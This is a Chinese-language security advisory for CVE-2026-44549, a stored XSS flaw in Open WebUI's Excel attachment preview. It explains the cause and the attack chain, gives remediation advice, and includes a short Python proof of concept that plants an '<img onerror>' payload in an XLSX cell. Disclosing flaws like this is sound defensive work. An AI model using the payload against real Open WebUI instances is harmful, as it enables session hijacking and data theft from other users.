CVE-2026-44549 CVSS 7.3 高危

CVE-2026-44549 Open WebUI存储型XSS漏洞

披露日期: 2026-05-15

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44549

漏洞类型

XSS

CVSS评分

7.3 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Open WebUI

漏洞概述

Open WebUI在0.8.0版本之前存在安全漏洞。由于Excel文件附件预览功能未对文件内容进行安全过滤，攻击者可构造恶意XLSX文件，利用sheet_to_html函数将XSS载荷嵌入HTML。当用户查看附件时，未经过滤的HTML被直接渲染至DOM，导致恶意脚本执行，窃取用户数据或劫持会话。

技术细节

该漏洞属于存储型跨站脚本攻击（XSS）。Open WebUI在处理Excel文件预览时，使用SheetJS库将Excel内容转换为HTML表格。攻击者可在Excel单元格中注入恶意的HTML/JS代码（如`<img src=x onerror=alert(1)>`）。`sheet_to_html`函数会将这些代码原样保留在生成的HTML字符串中。随后，Open WebUI前端框架使用类似`@html`的指令将此字符串直接插入页面DOM，且跳过了HTML实体编码和安全清理。这导致任何访问该附件的用户，其浏览器都会解析并执行其中的恶意JavaScript代码。

攻击链分析

STEP 1

1. 制作恶意文件

攻击者使用脚本构造包含XSS Payload的Excel文件（.xlsx），将恶意代码写入单元格。

STEP 2

2. 上传文件

攻击者登录Open WebUI平台，将构造好的恶意Excel文件作为附件上传。

STEP 3

3. 触发解析

攻击者诱导受害者（或其他用户）点击预览该Excel附件。

STEP 4

4. 执行攻击

后端/前端使用SheetJS将Excel转为HTML，并通过@html渲染至DOM，导致Payload在受害者浏览器中执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC to generate a malicious Excel file for CVE-2026-44549
# Requires: pip install openpyxl

import openpyxl

# Create a new workbook
wb = openpyxl.Workbook()
ws = wb.active

# Inject XSS payload into a cell
# When Open WebUI previews this file, the script executes
xss_payload = '<img src=x onerror=alert("CVE-2026-44549")>'
ws['A1'] = xss_payload

# Save the file
filename = 'malicious_cve_2026_44549.xlsx'
wb.save(filename)
print(f"[+] Generated {filename}")
print(f"[+] Upload this file to Open WebUI and preview it to trigger the XSS.")

影响范围

Open WebUI < 0.8.0

防御指南

临时缓解措施

建议立即升级到Open WebUI 0.8.0及以上版本以修复此漏洞。如果暂时无法升级，应禁用Excel文件预览功能，或部署Web应用防火墙（WAF）检测并拦截包含可疑HTML标签的文件上传请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表